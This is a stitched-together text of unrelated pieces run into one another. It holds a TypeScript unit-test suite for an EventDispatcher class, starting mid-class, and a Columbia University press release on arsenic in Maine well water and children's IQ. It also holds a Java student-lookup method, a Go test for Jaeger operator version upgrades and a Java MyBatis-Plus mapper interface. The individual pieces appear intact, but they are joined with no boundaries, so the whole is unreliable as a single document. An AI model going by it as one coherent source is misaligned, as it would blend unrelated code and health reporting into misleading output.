this.handler3Detail = event.detail; } } window.customElements.define('test-div-event-dispatch', TestDivEventDispatchElement); export default class { run() { describe('EventDispatcher', () => { it('Should initialize with correct values', () => { const node = {} as IoNode; let eventDispatcher = new EventDispatcher(node); chai.expect(eventDispatcher.node).to.be.equal(node); chai.expect(eventDispatcher.protoListeners).to.be.eql({}); chai.expect(eventDispatcher.propListeners).to.be.eql({}); chai.expect(eventDispatcher.addedListeners).to.be.eql({}); chai.expect(eventDispatcher.isEventTarget).to.be.eql(false); const element = document.createElement('div'); eventDispatcher = new EventDispatcher(element); chai.expect(eventDispatcher.node).to.be.equal(element); chai.expect(eventDispatcher.protoListeners).to.be.eql({}); chai.expect(eventDispatcher.propListeners).to.be.eql({}); chai.expect(eventDispatcher.addedListeners).to.be.eql({}); chai.expect(eventDispatcher.isEventTarget).to.be.equal(true); }); it('Should initialize listeners from ProtoChain', () => { let node = new IoNode1(); let eventDispatcher = new EventDispatcher(node); chai.expect(eventDispatcher.protoListeners).to.be.eql({ event1:[[node.handler1]], }); node = new IoNode2(); eventDispatcher = new EventDispatcher(node); chai.expect(eventDispatcher.protoListeners).to.be.eql({ event1:[[node.handler1]], event2:[[node.handler2, {capture:true}]] }); node = new IoNode3(); eventDispatcher = new EventDispatcher(node); chai.expect(eventDispatcher.protoListeners).to.be.eql({ event1:[[node.handler1], [node.handler3]], event2:[[node.handler2, {capture:true}], [handlerFunction, {passive: true}]], event3:[[handlerFunction]] }); }); it('Should set property listeners correctly', () => { const node = new IoNode2(); const eventDispatcher = new EventDispatcher(node); const handler4 = () => {}; const handler5 = () => {}; eventDispatcher.applyPropListeners({'on-event3': 'handler3', 'on-event4': handler4}); chai.expect(eventDispatcher.propListeners).to.be.eql({ event3:[[node.handler3]], event4:[[handler4]] }); eventDispatcher.applyPropListeners({'on-event5': ['handler3'], 'on-event6': [handler4]}); chai.expect(eventDispatcher.propListeners).to.be.eql({ event5:[[node.handler3]], event6:[[handler4]] }); eventDispatcher.applyPropListeners({'on-event7': [node.handler3, {capture: true}], 'on-event8': [handler5, {capture: true}]}); chai.expect(eventDispatcher.propListeners).to.be.eql({ event7:[[node.handler3, {capture:true}]], event8:[[handler5, {capture:true}]] }); eventDispatcher.applyPropListeners({}); chai.expect(eventDispatcher.propListeners).to.be.eql({}); }); it('Should add/remove listeners correctly', () => { const node = new IoNode2(); const eventDispatcher = new EventDispatcher(node); const listener1 = () => {}; const listener2 = () => {}; eventDispatcher.addEventListener('event1', listener1); eventDispatcher.addEventListener('event1', listener2, {capture: true}); chai.expect(eventDispatcher.addedListeners).to.be.eql({ event1:[[listener1],[listener2, {capture:true}]] }); eventDispatcher.removeEventListener('event1', listener1); chai.expect(eventDispatcher.addedListeners).to.be.eql({ event1:[[listener2, {capture:true}]] }); eventDispatcher.removeEventListener('event1'); chai.expect(eventDispatcher.addedListeners).to.be.eql({}); }); it('Should dispatch added events', () => { const node = new IoNode2(); const eventDispatcher = new EventDispatcher(node); let handler4Count = 0; const handler4 = () => { handler4Count++; }; let handler5Count = 0; const handler5 = () => { handler5Count++; }; eventDispatcher.applyPropListeners({'on-event3': 'handler3', 'on-event4': handler4}); eventDispatcher.addEventListener('event5', handler5); eventDispatcher.dispatchEvent('event1'); eventDispatcher.dispatchEvent('event2'); eventDispatcher.dispatchEvent('event3'); eventDispatcher.dispatchEvent('event4'); eventDispatcher.dispatchEvent('event5'); chai.expect(node.handler1Count).to.be.equal(1); chai.expect(node.handler2Count).to.be.equal(1); chai.expect(node.handler3Count).to.be.equal(1); chai.expect(handler4Count).to.be.equal(1); chai.expect(handler5Count).to.be.equal(1); // Remove events eventDispatcher.applyPropListeners({'on-event4': handler4}); eventDispatcher.removeEventListener('event5', handler5); eventDispatcher.dispatchEvent('event1'); eventDispatcher.dispatchEvent('event2'); eventDispatcher.dispatchEvent('event3'); eventDispatcher.dispatchEvent('event4'); eventDispatcher.dispatchEvent('event5'); chai.expect(node.handler1Count).to.be.equal(2); chai.expect(node.handler2Count).to.be.equal(2); chai.expect(node.handler3Count).to.be.equal(1); chai.expect(handler4Count).to.be.equal(2); chai.expect(handler5Count).to.be.equal(1); }); it('Should dispatch events with correct event detail', () => { const node = new IoNode2(); const eventDispatcher = new EventDispatcher(node); let handler4Detail: any; const handler4 = (event: CustomEvent) => { handler4Detail = event.detail; }; let handler5Detail: any; const handler5 = (event: CustomEvent) => { handler5Detail = event.detail; }; eventDispatcher.applyPropListeners({'on-event3': 'handler3', 'on-event4': handler4}); eventDispatcher.addEventListener('event5', handler5); eventDispatcher.dispatchEvent('event1', 'detail1'); eventDispatcher.dispatchEvent('event2', 'detail2'); eventDispatcher.dispatchEvent('event3', 'detail3'); eventDispatcher.dispatchEvent('event4', 'detail4'); eventDispatcher.dispatchEvent('event5', 'detail5'); chai.expect(node.handler1Detail).to.be.equal('detail1'); chai.expect(node.handler2Detail).to.be.equal('detail2'); chai.expect(node.handler3Detail).to.be.equal('detail3'); chai.expect(handler4Detail).to.be.equal('detail4'); chai.expect(handler5Detail).to.be.equal('detail5'); }); it('Should add/remove/dispatch events on HTML elements', () => { const element = document.createElement('test-div-event-dispatch') as TestDivEventDispatchElement; const eventDispatcher = new EventDispatcher(element); let handler4Count = 0; let handler4Detail: any; const handler4 = (event: CustomEvent) => { handler4Count++; handler4Detail = event.detail; }; let handler5Count = 0; let handler5Detail: any; const handler5 = (event: CustomEvent) => { handler5Count++; handler5Detail = event.detail; }; eventDispatcher.applyPropListeners({'on-event3': 'handler3', 'on-event4': handler4}); eventDispatcher.addEventListener('event5', handler5); element.dispatchEvent(new CustomEvent('event3', {detail: 'detail3'})); element.dispatchEvent(new CustomEvent('event4', {detail: 'detail4'})); element.dispatchEvent(new CustomEvent('event5', {detail: 'detail5'})); chai.expect(element.handler3Count).to.be.equal(1); chai.expect(handler4Count).to.be.equal(1); chai.expect(handler5Count).to.be.equal(1); chai.expect(element.handler3Detail).to.be.equal('detail3'); chai.expect(handler4Detail).to.be.equal('detail4'); chai.expect(handler5Detail).to.be.equal('detail5'); // Remove event listeners eventDispatcher.applyPropListeners({}); eventDispatcher.removeEventListener('event5', handler5); element.dispatchEvent(new CustomEvent('event3', {detail: 'detail3i'})); element.dispatchEvent(new CustomEvent('event4', {detail: 'detail4i'})); element.dispatchEvent(new CustomEvent('event5', {detail: 'detail5i'})); chai.expect(element.handler3Count).to.be.equal(1); chai.expect(handler4Count).to.be.equal(1); chai.expect(handler5Count).to.be.equal(1); chai.expect(element.handler3Detail).to.be.equal('detail3'); chai.expect(handler4Detail).to.be.equal('detail4'); chai.expect(handler5Detail).to.be.equal('detail5'); }); it('Should bubble events if specified', () => { const element = document.createElement('test-div-event-dispatch') as TestDivEventDispatchElement; const parentElement = document.createElement('test-div-event-dispatch') as TestDivEventDispatchElement; parentElement.appendChild(element); const eventDispatcher = new EventDispatcher(element); let eventCount = 0; parentElement.addEventListener('event', () => { eventCount++; }); eventDispatcher.dispatchEvent('event', null, false); chai.expect(eventCount).to.be.equal(0); eventDispatcher.dispatchEvent('event', null, true); chai.expect(eventCount).to.be.equal(1); eventDispatcher.dispatchEvent('event'); chai.expect(eventCount).to.be.equal(2); }); it('Should emit event from specified target', () => { const element = document.createElement('div'); const eventDispatcher = new EventDispatcher(element); const element2 = document.createElement('test-div-event-dispatch') as TestDivEventDispatchElement; const eventDispatcher2 = new EventDispatcher(element2); eventDispatcher2.applyPropListeners({'on-event3': 'handler3'}); let path: any = null; let target: any = null; eventDispatcher2.addEventListener('event3', (event: CustomEvent) => { path = (event as any).path; target = (event as any).target; }); eventDispatcher.dispatchEvent('event3', 'detail', false, element2); chai.expect(element2.handler3Detail).to.be.equal('detail'); chai.expect(path).to.be.eql([element2]); chai.expect(target).to.be.eql(target); }); it('Should dispose correctly', () => { const node = new IoNode2(); const eventDispatcher = new EventDispatcher(node); eventDispatcher.dispose(); chai.expect(eventDispatcher.node).to.be.equal(undefined); chai.expect(eventDispatcher.protoListeners).to.be.equal(undefined); chai.expect(eventDispatcher.propListeners).to.be.equal(undefined); chai.expect(eventDispatcher.addedListeners).to.be.equal(undefined); }); }); } }
In Maine study, rates of contamination exceed WHO and EPA guidelines A study by researchers at Columbia University reports that schoolchildren from three school districts in Maine exposed to arsenic in drinking water experienced declines in child intelligence. While earlier studies conducted by the researchers in South Asia, and Bangladesh in particular, showed that exposure to arsenic in drinking water is negatively associated with child intelligence, this is the first study to examine intelligence against individual water arsenic exposures in the U.S. Findings are reported online in the journal, Environmental Health. The research team, led by Joseph Graziano, PhD, professor of Environmental Health Sciences at Columbia University’s Mailman School of Public Health, assessed 272 children in grades 3–5, who were, on average, 10 years old, from three school districts in Maine where household wells are the predominant source for drinking water and cooking. The Augusta area in particular was studied because of earlier research indicating higher than normal exposures. Using the Wechsler Intelligence Scale for Children (WISC-IV), the most often used assessment tool for measuring intelligence in children ages 6 to 16, the researchers found that arsenic in household water was associated with decreased scores on most WISC-IV indices. After adjusting for maternal IQ and education, characteristics of the home environment, school district, and number of siblings, the children who were exposed to greater than 5 parts arsenic per billion of household well water (WAs ≥ 5 μg/L) showed reductions in Full Scale, Working Memory, Perceptual Reasoning and Verbal Comprehension scores, losses of 5–6 points, considered a significant decline, that may translate to problems in school, according to Gail Wasserman, PhD, professor of Medical Psychology in the Department of Psychiatry at Columbia, and the study’s first author. Water samples were taken at the point of entry into the home via connection to the garden hose and at the consumption point, the kitchen sink. The researchers also considered drinking habits, length of residence in the home, well construction and use of filtering procedures. On average, water arsenic (WAs) levels measured at the kitchen tap were 9.88 parts arsenic (9.88μg/L), with almost a third of samples exceeding 10 μg/L, the maximum contaminant level guideline of the World Health Organization and U.S. Environmental Protection Agency. The highest level of WAs reported was 115.3 μg/L. “The strength of associations found in this study is comparable to the modest increases that have been found in blood lead, an established risk factor for diminished IQ,” said Dr. Graziano. Analogous to the earlier work in Bangladesh with similarly aged children, the researchers found negative associations between water arsenic and performance that persisted upon adjustment for similar socio-demographic data. However, in Bangladesh, IQ tests were slightly modified to increase cultural appropriateness, and not precisely the same test as administered in Maine. Also significant, in Bangladesh and other such countries, children’s nutritional and health status, as well as their regularity of school attendance, differs from that of U.S children. Most noteworthy, Dr. Graziano emphasizes that water arsenic concentrations in the previously studied settings ranged far higher than in these U.S. communities, but also included low levels. “Our findings of adverse impact in a U.S. sample, particularly in performance-related functioning, gives confidence to the generalizability of findings from our work in Bangladesh, where we also observed a steep drop in intelligence scores in the very low range of water arsenic concentrations,” said Dr. Graziano, who is also professor of Pharmacology at Columbia’s College of Physicians and Surgeons. “Collectively, our work in Bangladesh and in Maine suggests that aspects of performance intelligence, particularly perceptual reasoning and working memory, are impacted by exposure to arsenic in drinking water.” “Even though purchasing a standard filter at the hardware store is inadequate for treating well water, the good news is that there are steps one can take to ameliorate the situation,” noted Dr. Graziano. Although somewhat expensive, Dr. Graziano and other experts recommend installing a reverse osmosis system to alleviate the effects of water arsenic. A series of outreach programs are also underway to educate families in the region. The work was supported by National Institute of Environmental Health Sciences (grants P42 ES 10349 and P30 ES 09089). The authors declare no conflict of interests. Additional authors include Xinhua Liu, Nancy LoIacono, Jennie Kline Pam Factor-Litvak, Alexander van Geen, Jacob Mey, and Diane Levy, all of Columbia; Richard Abramson, formerly of Readfield, ME public schools; and Amy Schwartz of the University of New Hampshire. About Columbia University’s Mailman School of Public Health Founded in 1922, Columbia University’s Mailman School of Public Health pursues an agenda of research, education, and service to address the critical and complex public health issues affecting New Yorkers, the nation and the world. The Mailman School is the third largest recipient of NIH grants among schools of public health. Its over 450 multi-disciplinary faculty members work in more than 100 countries around the world, addressing such issues as preventing infectious and chronic diseases, environmental health, maternal and child health, health policy, climate change & health, and public health preparedness. It is a leader in public health education with over 1,300 graduate students from more than 40 nations pursuing a variety of master’s and doctoral degree programs. The Mailman School is also home to numerous world-renowned research centers including ICAP (formerly the International Center for AIDS Care and Treatment Programs) and the Center for Infection and Immunity. For more information, please visit www.mailman.columbia.edu.
/** Check if there is personal data for student with given email. * @param email student email * @return true if data is found, false if not. */ public boolean studentExists( String email ) { try { personsTable.getRowForPerson(email); return true; } catch ( DiplomaDataProvider.RequiredDataNotFoundException e ) { return false; } }
<reponame>abstulo/jaeger-operator<gh_stars>0 package jaeger import ( "testing" "github.com/spf13/viper" "github.com/stretchr/testify/assert" "k8s.io/apimachinery/pkg/types" v1 "github.com/jaegertracing/jaeger-operator/pkg/apis/jaegertracing/v1" ) func TestDirectNextMinor(t *testing.T) { viper.Set("jaeger-version", "") defer viper.Reset() // prepare nsn := types.NamespacedName{ Name: "my-instance", } r := &ReconcileJaeger{} j := *v1.NewJaeger(nsn) j.Status.Version = "1.12.0" //test j, err := r.applyUpgrades(j) // verify assert.NoError(t, err) // we cannot make any other assumptions here, but we know that 1.12.0 is an older // version, so, at least the status field should have been updated assert.NotEqual(t, "1.12.0", j.Status.Version) } func TestSetVersionOnNewInstance(t *testing.T) { // prepare r := &ReconcileJaeger{} j := *v1.NewJaeger(types.NamespacedName{Name: "my-instance"}) //test j, err := r.applyUpgrades(j) // verify assert.NoError(t, err) // we cannot make any other assumptions here, but we know that 1.12.0 is an older // version, so, at least the status field should have been updated assert.NotEmpty(t, j.Status.Version) }
<reponame>oubijie/ssm_quickstart package com.veryoo.ssmqs.mapper; import com.veryoo.ssmqs.entity.Menu; import java.util.List; import com.baomidou.mybatisplus.core.mapper.BaseMapper; /** * <p> * Mapper 接口 * </p> * * @author oubijie * @since 2019-07-22 */ public interface MenuMapper extends BaseMapper<Menu> { List<Menu> selectMenuByUser(String username); }